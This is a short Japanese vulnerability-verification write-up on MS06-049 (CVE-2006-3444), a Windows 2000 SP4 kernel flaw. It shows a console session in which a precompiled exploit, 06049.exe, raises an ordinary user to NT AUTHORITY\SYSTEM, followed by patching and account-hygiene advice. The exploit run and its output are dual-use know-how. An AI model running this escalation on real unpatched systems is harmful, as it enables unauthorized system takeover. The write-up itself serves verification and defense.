MS06-049:Windows カーネルの脆弱性により、特権が昇格される

* 2006/09/24　初版

• Author grin

• Windowsカーネルの脆弱性に対するLocalExploit
• ローカルの一般ユーザが特権へと昇格

• Microsoft Windows 2000 Service Pack 4

• Microsoft::Microsoft Windows のセキュリティ修正プログラム
• CVE-2006-3444

• Windows 2000 Server SP4 日本語版

• SYSTEM権限を取得可能。
• 一般ユーザでログイン後、以下コマンドを実行する。

C:\>whoami
W2KSV-VM\grin

C:\>06049.exe

MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerabiity Exploit

Create by SoBeIt.

Kernel base address: 80400000
Allocated address:9f0000
File size:1a3b10
NtVdmControl Address:80512dae
Single value:5b
Jump value:e900
Base value:ec8b55cc
Need value generated:ec8be951
Count value:19f
Single value:5b
Jump value:80c0
Base value:7868ff6a
Need value generated:786980ce
Count value:16c
Exploitation finished.

C:\>whoami
NT AUTHORITY\SYSTEM

1. MS06-049 パッチの適用 (Windows Update の実施)
2. 不要なユーザの削除
3. 各ユーザにおける強固なパスワード設定の徹底

• この脆弱性に対するパッチにはNTFS圧縮に関する不具合があったようですので、以下サポートページを見直すことを推奨いたします。
  • Microsoftサポートオンライン：4 KB より大きいサイズの圧縮ファイルを作成または更新すると、ファイルが破損することがある